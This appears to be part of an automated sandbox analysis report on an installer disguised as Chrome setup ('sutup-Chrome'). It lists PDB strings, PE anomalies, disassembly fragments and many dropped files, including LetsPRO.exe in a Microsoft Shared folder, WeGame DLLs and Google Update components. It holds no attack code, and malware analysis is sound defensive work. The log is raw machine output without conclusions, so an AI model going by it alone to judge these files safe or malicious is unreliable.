                  Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
                  Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
                  Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
                  Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
                  Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,4_2_03F37490
                  Source: GoogleUpdateSetup.exe.16.drStatic PE information: real checksum: 0x154762 should be: 0x15c4ea
                  Source: LetsPRO.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x6020
                  Source: LetsPRO.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x6020
                  Source: ChromeSetup.exe.1.drStatic PE information: real checksum: 0x154762 should be: 0x15c4ea
                  Source: beacon_sdk.dll.1.drStatic PE information: section name: .QMGuid
                  Source: common.dll.1.drStatic PE information: section name: .QMGuid
                  Source: Lua51.dll.1.drStatic PE information: section name: .00cfg
                  Source: MSIB404.tmp.1.drStatic PE information: section name: .didat
                  Source: MSIB5FB.tmp.1.drStatic PE information: section name: .didat
                  Source: GoogleUpdateComRegisterShell64.exe.16.drStatic PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.16.drStatic PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.16.drStatic PE information: section name: .gehcont
                  Source: psmachine.dll.16.drStatic PE information: section name: .orpc
                  Source: psmachine_64.dll.16.drStatic PE information: section name: .orpc
                  Source: psmachine_64.dll.16.drStatic PE information: section name: _RDATA
                  Source: psmachine_64.dll.16.drStatic PE information: section name: .gxfg
                  Source: psmachine_64.dll.16.drStatic PE information: section name: .gehcont
                  Source: psuser.dll.16.drStatic PE information: section name: .orpc
                  Source: psuser_64.dll.16.drStatic PE information: section name: .orpc
                  Source: psuser_64.dll.16.drStatic PE information: section name: _RDATA
                  Source: psuser_64.dll.16.drStatic PE information: section name: .gxfg
                  Source: psuser_64.dll.16.drStatic PE information: section name: .gehcont
                  Source: GoogleCrashHandler64.exe.16.drStatic PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.16.drStatic PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.16.drStatic PE information: section name: .gehcont
                  Source: psuser.dll.30.drStatic PE information: section name: .orpc
                  Source: psuser_64.dll.30.drStatic PE information: section name: .orpc
                  Source: psuser_64.dll.30.drStatic PE information: section name: _RDATA
                  Source: psuser_64.dll.30.drStatic PE information: section name: .gxfg
                  Source: psuser_64.dll.30.drStatic PE information: section name: .gehcont
                  Source: psmachine.dll.30.drStatic PE information: section name: .orpc
                  Source: psmachine_64.dll.30.drStatic PE information: section name: .orpc
                  Source: psmachine_64.dll.30.drStatic PE information: section name: _RDATA
                  Source: psmachine_64.dll.30.drStatic PE information: section name: .gxfg
                  Source: psmachine_64.dll.30.drStatic PE information: section name: .gehcont
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F9E65 push ecx; ret 4_2_025F9E78
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F44345 push ecx; ret 4_2_03F44358
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F5A168 push eax; ret 4_2_03F5A119
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F5A0B8 push eax; ret 4_2_03F5A119
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C8F2D80 push eax; ret 5_2_6C8F2D9E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9009C5 push ecx; ret 5_2_6C9009D8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C91A6CA push EF3FEFD4h; iretd 5_2_6C91A6D1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C919CF8 pushad ; iretd 5_2_6C919D06
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C90BFB0 push ecx; ret 5_2_6C90BFC3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258835 push ecx; ret 8_2_00258848
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258C76 push ecx; ret 8_2_00258C89
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_000159A6 push ecx; ret 16_2_000159B9
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00026CF3 push ecx; ret 16_2_00026D06
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00134543 push ecx; ret 30_2_00134556
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00127A56 push ecx; ret 30_2_00127A69
                  Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.910468675356735

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Program Files (x86)\ChromeSetup.exeExecutable created and started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\beacon_sdk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ChromeSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\WeGame\common.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB59C.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB54D.tmpJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB404.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dllJump to dropped file
